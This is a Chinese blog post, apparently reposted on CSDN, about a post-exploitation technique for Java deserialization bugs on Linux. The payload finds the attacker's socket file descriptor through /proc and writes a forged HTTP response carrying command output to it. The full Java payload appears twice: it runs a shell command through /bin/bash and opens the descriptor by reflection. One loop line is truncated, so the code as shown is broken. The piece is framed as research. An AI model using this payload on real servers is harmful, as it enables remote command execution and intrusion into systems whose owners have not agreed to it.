linux 文件描述符 聚拢性,Linux下文件描述符回显构造

最新推荐文章于 2024-05-16 08:00:53 发布
最新推荐文章于 2024-05-16 08:00:53 发布
阅读量124 收藏
点赞数
文章标签: linux 文件描述符 聚拢性
本文探讨了一种在Linux环境下通过文件描述符获取回显的方法,涉及TCP连接信息、inode编号和Java代码实现。由于依赖于特定环境,此方法的适用性有限,不适用于大型网络环境或Mac系统。实践中,通过反序列化应用案例,找到并操控文件描述符,最终实现了篡写fd内容以构造回显。
摘要由CSDN通过智能技术生成

1 前言

前面讲了如果通过工具来半自动化挖掘中间件的回显构造方法,那么本篇在适用性上远比前文小,文件描述符只存在于Linux环境下,甚至在Mac环境下都不能调试,因此其局限性还是非常大的,另外在实际环境中如果遇到反代这种大型网络环境,通过这种方法来获取回显也会打上一个大大的问号,所以本文还是保持研究的态度来对这种回显方法一探究竟。

2 实践

在实践前,我们先通过人为模拟来寻找我们所能操控的文件描述符编号

d5cd282ac705e85bbf3102dc8ac5cca7.png

还是熟悉的一个反序列化的应用案例,这里debug后我们来到服务器查看相对应的文件描述信息

f1230c7d2afa90c38b7a13078df6aa85.png

这里对照第五行发现其中的ip地址经过了十六位进制转化,服务器的ip地址为192.168.59.148,对应local_address,而本机ip地址为192.168.59.1,对应remote_address,这里以192.168.59.148为例进行十六进制转化,转化后为C0.A8.3B.94,按照顺序排序后为943BA8C0,后面的1F90怀疑是socket的连接端口,这个暂且不深究,那么看到这里我们就能够知道sl对应5的这条信息其实就是我们本机与远端服务器的交互信息,其中inode为58016。

那么讲到这里就开始出现了如何取这个uid编号的问题,有人说利用ip地址,那么假设是vps的环境下,ip地址固定,通过寻找ip字符串就能拿到相应的inode编号,这是一种办法,而这里由于只有笔者一台服务器,所以这里可以很明显的发现存在交互的socket连接信息其中存在-1的字段,那么在本文的实验环境下是可以通过这个-1的标志位来取的,实际环境下不建议这么做。。

另外这里走了很长的弯路,一直以为文件描述信息在/proc/thread-self/net/tcp其中,但是经过不断地实验发现取上述地址并不能获得回显,但是会在catalina的记录里出现,因此这里取地址的时候需要越过这个坑。

那么这里我们已经取到了inode编号为58016,接下来到对应的pid目录下去看一看socket连接信息

357832c24fc2778b1b09f30558eabf20.png

这里tomcat的pid编号为3303,通过命令“ls -l /proc/3303/fd”即可查看tomcat的所有连接信息,这里对应58016编号,可以看到文件描述符为62

d24f6d23a513319c8492f6d3f56cf48e.png

至此我们通过手工方法复现了寻找文件描述符的方法,最后通过java代码来篡写fd为62的文件内容

以下附上实验代码

//ShellExec

String command = "whoami";

java.util.List cmds = new java.util.ArrayList();

cmds.add("/bin/bash");

cmds.add("-c");

cmds.add(command);

ProcessBuilder pb = new ProcessBuilder(cmds);

pb.redirectErrorStream(true);

Process proc = pb.start();

byte[] out = new byte[1024 * 10];

proc.getInputStream().read(out);

//GetInode

java.io.File f1 = new java.io.File("/proc/thread-self/net/tcp6");

java.io.BufferedReader br = new java.io.BufferedReader(new java.io.FileReader(f1));

String line,inode,uid = "";

while ((line = br.readLine()) != null) {

String[] lineArr = line.split("\\s+");

if (lineArr.length == 18){

inode = lineArr[17];

java.util.regex.Pattern pattern = java.util.regex.Pattern.compile("^[-\\+]?[\\d]*$");

if(pattern.matcher(inode).matches() && Integer.parseInt(inode) < 0) {

uid = lineArr[10];

break;

}

}

}

//getFdFile

String tmp = "";

java.io.File file = new java.io.File("/proc/thread-self/fd");

java.io.File[] fs = file.listFiles();

for (int i=0;i

java.io.File f = fs[i];

java.nio.file.Path path = java.nio.file.Paths.get(f.toString(), new String[]{""});

String link = java.nio.file.Files.readSymbolicLink(path).toString();

if (link.contains(uid)) {

tmp = f.toString();

break;

}

}

//getFd

Class clazz = Class.forName("java.io.FileDescriptor");

java.lang.reflect.Constructor m = clazz.getDeclaredConstructor(new Class[]{Integer.TYPE});

m.setAccessible(true);

String[] fdArr = tmp.split("/");

String fdId = fdArr[fdArr.length - 1];

java.io.FileDescriptor fd = (java.io.FileDescriptor) m.newInstance(new Object[]{new Integer(fdId)});

//writeFd

String body = new String(out);

String response = "HTTP/1.1 200 OK\r\n"

+ "Content-Type: text/html\r\n"

+ "Content-Length: " + body.length()

+ "\r\n\r\n"

+ body

+ "\r\n\r\n";

java.io.FileOutputStream os = new java.io.FileOutputStream(fd);

os.write(response.getBytes());

os.close();

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

//ShellExec

Stringcommand="whoami";

java.util.Listcmds=newjava.util.ArrayList();

cmds.add("/bin/bash");

cmds.add("-c");

cmds.add(command);

ProcessBuilderpb=newProcessBuilder(cmds);

pb.redirectErrorStream(true);

Processproc=pb.start();

byte[]out=newbyte[1024*10];

proc.getInputStream().read(out);

//GetInode

java.io.Filef1=newjava.io.File("/proc/thread-self/net/tcp6");

java.io.BufferedReaderbr=newjava.io.BufferedReader(newjava.io.FileReader(f1));

Stringline,inode,uid="";

while((line=br.readLine())!=null){

String[]lineArr=line.split("\\s+");

if(lineArr.length==18){

inode=lineArr[17];

java.util.regex.Patternpattern=java.util.regex.Pattern.compile("^[-\\+]?[\\d]*$");

if(pattern.matcher(inode).matches()&&Integer.parseInt(inode)<0){

uid=lineArr[10];

break;

}

}

}

//getFdFile

Stringtmp="";

java.io.Filefile=newjava.io.File("/proc/thread-self/fd");

java.io.File[]fs=file.listFiles();

for(inti=0;i

java.io.Filef=fs[i];

java.nio.file.Pathpath=java.nio.file.Paths.get(f.toString(),newString[]{""});

Stringlink=java.nio.file.Files.readSymbolicLink(path).toString();

if(link.contains(uid)){

tmp=f.toString();

break;

}

}

//getFd

Classclazz=Class.forName("java.io.FileDescriptor");

java.lang.reflect.Constructorm=clazz.getDeclaredConstructor(newClass[]{Integer.TYPE});

m.setAccessible(true);

String[]fdArr=tmp.split("/");

StringfdId=fdArr[fdArr.length-1];

java.io.FileDescriptorfd=(java.io.FileDescriptor)m.newInstance(newObject[]{newInteger(fdId)});

//writeFd

Stringbody=newString(out);

Stringresponse="HTTP/1.1 200 OK\r\n"

+"Content-Type: text/html\r\n"

+"Content-Length: "+body.length()

+"\r\n\r\n"

+body

+"\r\n\r\n";

java.io.FileOutputStreamos=newjava.io.FileOutputStream(fd);

os.write(response.getBytes());

os.close();

最后通过模拟http返回包内容来构造回显内容,然后配合上反序列化,至此就能够拿到页面回显。

0ddf300893f5322aec67ab24224e69b6.png

3 后记

这种回显构造的方式仅局限于linux环境,所以局限性还是非常大的,并不如前文提到的利用response构造回显应用的那么广泛。

weixin_39769675
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Java反序列化回显构造Linux文件描述符回显
Vicl1fe的博客
08-18 311
前言 都知道在Shiro反序列化中是无回显的,此文章是基于Linux文件描述符进行回显。 环境 我使用的是sprint boot进行测试的 pom.xml如下 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="
java执行linux和window命令续集----应用ProcessBuilder
莉lily的博客
07-10 1119
上一篇地址:https://mp.csdn.net/postedit/83857969 在上次命令中,一直没出现问题,直到前段时间公司所有服务器迁移,项目也随着迁移,介于服务器能上存在的差异,在执行while ((rspLine = in.readLine()) != null) {}中出现了进程阻塞,形成死循环状态,其实呢linux命令已经正确执行完,.getInputStrea...
ProcessBuilder 创建操作系统进程
蚩尤后裔-汪茂雄
06-28 6337
目录 ProcessBuilder 概述 方法概述 API 测试 路径空格说明 ProcessBuilder 概述 1、public final class java.lang.ProcessBuilder extends Object :此类用于创建操作系统进程。 2、每个 ProcessBuilder 实例管理一个进程属集,start() 方法利用这些属创建一个新的 Pro...
Linux重要目录“/proc”,你还不知道作用?
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
05-16 298
转自:网络proc简介在linux的根目录下存在一个/proc目录,/proc文件系统是一种虚拟文件系统,以文件系统目录和文件形式,提供一个指向内核数据结构的接口,通过它能够查看和改变各种系统属.proc目录通常情况下是由系统自动挂载在/proc目录下,但是我们也可以自行手动挂载.1mount -t proc proc /proc/proc目录下的大部分文件都是只读的,部分文件是可写的,我们通过...
java调用linux命令带星号的问题,ProcessBuilder无法执行带星号的shell命令
weixin_42227109的博客
05-02 357
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?有个需求,需要在本地生成数据文档,然后scp到另外一个服务器上。我是用ProcessBuilder来执行scp命令的,调试的时候发现这个scp命令会失败,报No such file or directory。代码如下:1234567891011121314151617181920212223242526272829303...
ProcessBuilder创建本地进程执行命令
weixin_30904593的博客
03-15 195
ProcessBuilder类是J2SE 1.5在java.lang中新添加的一个新类,可以用来创建子进程,并且比用Runtime.exec使用更方便。 在CommandExecutor类中,SCRIPT_DIR表明脚本所在的目录位置,示例程序默认为系统的用户目录。 public static final String SCRIPT_DIR = System.getProperty("us...
linux文件管理命令实例分析【显示、查看、统计等】
01-20
本文实例讲述了linux文件管理命令。分享给大家供大家参考,具体如下: 1、显示文件内容 cat : 显示文件内容 tac : 倒序显示内容 2、更改文件权限 chmod :更改文件权限 -R 递归改变 chown :更改文件拥有...
ajax实现文件异步上传并回显文件相关信息功能示例
10-18
主要介绍了ajax实现文件异步上传并回显文件相关信息功能,结合实例形式分析了基于jQuery $.ajax方法的文件异步上传以及后台java程序对文件信息的读取与显示相关操作技巧,需要的朋友可以参考下
linux下java反序列化通杀回显方法的低配版实现 - 先知社区1
08-03
整个流程中涉及的主要步骤包括使用requests库发送带有特定源端口号的GET请求,以及在服务器端使用Linux命令行工具解析`/proc`目录下的信息来定位和操作相应的socket文件描述符。 总结来说,这篇文章介绍了一种在...
Linux环境下C语言)学生管理系统
最新发布
05-21
Linux环境下C语言学习实例, 主要练习指针,结构体,以及makefile的使用 为了便于查看实现效果,使用了命令回显 学生管理系统,实现了增删改查功能。 下载至linux环境后 tar -xvf student.tar.gz 解归档到当前目录...
Java应用程序中执行Linux指令(无第三方jar包)
b___w的博客
06-06 4461
在一些Java应用程序中,需要执行一些Linux系统命令,例如服务器资源查看、文件操作等。为了实现这样的需求,本文将介绍如何在Java应用程序中执行Linux指令,并提供一些实用的示例。此外,本文不使用第三方jar包,完全基于Java自带的API库。
解决单引号跟ProcessBuilderLinux环境下运行命令报错的问题
qq_24985201的博客
07-09 1443
背景:项目需求需要在Java代码里使用ProcessBuilder调用Linux环境下K8S的命令 完整命令为: kubectl --kubeconfig=/home/service/k8s/<ns>.config -n <ns> patch service <service_name> -p '{"spec":{"selector":{"app":"<deployment-name>"}}}' 前面是K8S的固定格式,只需要关注最后一段 -p '{"spe
Java笔记-使用processBuilder调用shell(Linux
IT1995的博客
11-14 2355
环境是这样的,前端发起一个post请求,里面的信息带有要启动的进程,java后端接收到这个进程名后,使用linux的shell调用指定的程序。
linux proc 目录清理_Linux下/proc目录简介
weixin_29130255的博客
12-24 2980
proc简介在linux的根目录下存在一个/proc目录,/proc文件系统是一种虚拟文件系统,以文件系统目录和文件形式,提供一个指向内核数据结构的接口,通过它能够查看和改变各种系统属.proc目录通常情况下是由系统自动挂载在/proc目录下,但是我们也可以自行手动挂载.1mount -t proc proc /proc/proc目录下的大部分文件都是只读的,部分文件是可写的,我们通过这些可写的...
94-ICMP 协议(回显请求与应答)
进击的小学生
05-18 1万+
当 ICMP 首部 type = 8, code = 0,该 ICMP 是回显请求报文。当 type = 0, code = 0 时,是回显应答报文。1. 回显请求与应答报文1.1 首部格式 图1 ICMP 回显请求与应答报文首部 当 ICMP 报文是回显请求与应答报文时,我们可以看到首部的第 4、5 两个字节是标识符字段,第 6、7 两个字节是序号字段。1.2 结构体该结构体定义在 unp
/proc/self/目录的意义
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
File && FileDescriptor
asivy的专栏
01-23 1766
转自:http://www.fengfly.com/plus/view-214059-1.html File  File是“文件”和“目录路径名”的抽象表示形式。 File 直接继承于Object,实现了Serializable接口和Comparable接口。实现Serializable接口,意味着File对象支持序列化操作。而实现Comparable接口,意味着File对象之间可以比较大小
每天进步一点点——Linux中的文件描述符与打开文件之间的关系
热门推荐
Cynric 的博客
08-31 12万+
快速理解文件描述符与进程打开文件之间的关系
Linux下Java反序列化回显技术简易实现解析
"Linux下Java反序列化漏洞利用的低配版实现,主要涉及Java与Linux系统交互,通过获取socket文件描述符实现数据回显。" 本文主要探讨的是在Linux环境下利用Java反序列化漏洞实现数据回显的一种低配版本方法。通常,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值